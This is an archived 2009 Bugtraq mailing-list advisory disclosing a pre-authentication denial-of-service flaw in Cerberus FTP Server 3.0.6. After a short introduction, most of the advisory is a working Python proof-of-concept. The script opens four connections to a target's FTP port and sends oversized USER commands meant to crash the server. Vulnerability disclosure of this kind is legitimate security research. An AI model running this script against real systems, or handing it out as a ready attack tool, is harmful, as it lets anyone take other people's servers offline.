lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <215014.74345.qm@web112816.mail.gq1.yahoo.com>
Date: Thu, 1 Oct 2009 06:21:14 -0700 (PDT)
From: Protek Research Lab <protekresearchlab@...oo.ca>
To: bugtraq@...urityfocus.com
Subject: {PRL} Cerberus FTP server 3.0.6 Pre-Auth DoS

#####################################################################################

Application:  Cerberus FTP 3.0.6
            
Platforms:    Windows XP Professional SP2
              Windows Vista SP1 

crash:	      YES
	
Exploitation: Remote DoS

Date:         2009-09-30

Author:       Francis Provencher (Protek Research Lab's) 
             

#####################################################################################

1) Introduction
2) Technical details
3) The Code


#####################################################################################

===============
1) Introduction
===============

Cerberus FTP Server is a secure and easy-to-use professional Windows FTP server featuring FIPS 140-2 certified encryption.

(from Cerberus FTP server website)


#####################################################################################

============================
2) Technical details 
============================

Cerberus FTP server Professional
Version 3.0.6
Build date  2009/09/28



#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;


#!/usr/bin/env python

###################################################################################
#
# Cerberus FTP Server Denial of Service Exploit (Pre Auth)
# Found By:     Francis Provencher (Protek Research Lab's)
# Tested On:    Windows XPSP2
# Usage:        ./script <Target IP>
#
###################################################################################

import socket, sys

def banner():
        print "\n##################################################################"
        print "#                                                                #"
        print "#     Cerberus FTP Server Denial of Service Exploit (Pre Auth)   #"
        print "#           Francis Provencher (Protek Researh Lab's)            #"
        print "#                                                                #"
        print "##################################################################\n"

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);

buff1 = ("\x41" * 330 );
buff2 = ("\x41" * 520 );
buff3 = ("\x41" * 2230 );


try:
        banner();
        print ("[*] Connecting to target...");
        s1.connect((sys.argv[1] , 21));
        s2.connect((sys.argv[1] , 21));
        s3.connect((sys.argv[1] , 21));
        s4.connect((sys.argv[1] , 21));
        print ("[*] Sending evil stuff...");
        s1.send("USER " + buff1 + "\r\n");
        s2.send("USER " + buff2 + "\r\n");
        s3.send("USER " + buff3 + "\r\n");
        s4.send("USER " + buff1 + "\r\n");
        print ("[*] Success! The server should now be inaccessible");
        s1.close();
        s2.close();
        s3.close();
        s4.close();

except:
        print ("[-] Could not connect to server.");



#####################################################################################
(PRL-2009-09)


      __________________________________________________________________
Be smarter than spam. See how smart SpamGuard is at giving junk email the boot with the All-new Yahoo! Mail.  Click on Options in Mail and switch to New Mail today or register for free at http://mail.yahoo.ca

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ